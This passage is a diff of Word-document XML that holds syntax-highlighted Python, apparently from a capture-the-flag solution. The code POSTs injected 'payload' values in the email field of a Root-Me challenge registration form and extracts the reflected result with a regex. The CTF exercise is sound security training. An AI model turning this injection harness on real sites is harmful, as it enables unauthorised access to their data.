+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>})</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>match</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>re</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>search</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"Email : ([^&lt;]+)&lt;br /&gt;"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>request</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>text</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>match</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>match</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>group</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t># Get a injected value</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>setValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'username'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}{0}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'password'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'pw'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'email'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>request</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>post</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'http://challenge01.root-me.org/web-serveur/ch33/?action=register'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>headers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
